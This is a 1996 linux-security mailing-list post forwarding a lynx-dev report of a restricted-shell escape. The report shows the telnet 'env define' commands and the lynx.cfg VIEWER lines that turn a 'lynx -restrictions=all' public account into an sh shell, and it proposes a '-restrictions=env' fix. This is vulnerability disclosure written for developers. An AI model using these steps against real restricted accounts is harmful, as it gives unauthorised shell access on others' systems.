[1103] in linux-security and linux-alert archive
[linux-security] LYNX-DEV security problem with environment for lynx -restrictions=all (fwd)
daemon@ATHENA.MIT.EDU (Roscinante)
Tue Aug 27 22:06:39 1996
Date: Mon, 26 Aug 1996 09:36:14 -0400 (EDT)
From: Roscinante <rosc@fbn.globalent.net>
To: Linux-security <linux-security@tarsier.cv.nrao.edu>
This came in today on the lynx-dev list, thought it would be of interest to
linux security (not sure what OS this fellow is using, I sent a reply, and
told him about the 'fixed' telnet)
---------- Forwarded message ----------
Date: Sun, 25 Aug 1996 23:21:03 EDT
From: mhpower@MIT.EDU
Reply-To: lynx-dev@sig.net
To: lynx-dev@sig.net
Subject: LYNX-DEV security problem with environment for lynx -restrictions=all
In using Lynx 2.5FM (22 August version) from a public-login account
whose shell runs "lynx -restrictions=all", I've found it's possible to
defeat some restrictions and obtain interactive access to /bin/sh by
passing the environment variables WWW_HOME and LYNX_CFG via telnetd.
The attack will work on more system types if it's possible to write to
some filesystem that's mounted by the target machine. For example,
% telnet
telnet> env define WWW_HOME http://anyserver/anything.gif
telnet> env define LYNX_CFG /afs/some.cell/users/myname/lynx.cfg
telnet> open public-lynx-host -l lynx
where /afs/some.cell/users/myname/lynx.cfg contains
SUFFIX:.gif:image/gif
VIEWER:image/gif:sh
This gives me an sh shell on public-lynx-host with the uid of "lynx".
On some system types, it may instead be possible to do
telnet> env define LYNX_CFG /dev/stdin
and type in the desired contents (e.g., the SUFFIX and VIEWER lines).
I'd suggest adding support for "-restrictions=env" which would prevent
lynx from modifying its behavior based on any call to getenv. Of
course, a public-login account might be better configured to
explicitly set WWW_HOME and LYNX_CFG (or use "-cfg=") before starting
lynx, but I think the risk of setup mistakes would be reduced if
ignoring the environment were supported within the lynx source code.
Matt
~~
All that is gold does not glitter.. .
Not all those who wander are lost..J.R.R.T. . /\ .
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ._____// \\_____.
And the knowledge that they fear . \\ Rush // .
is a weapon to be held against them.. N.P. . \\ 2112 // .
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ . // /\ \\ .
Ghost in the Machine (wraith@styx.ios.com) I[[[[[[[[]]]]]]]]I
Roscinante (rosc@fbn.globalent.net)
http://www.globalent.net/users/fbn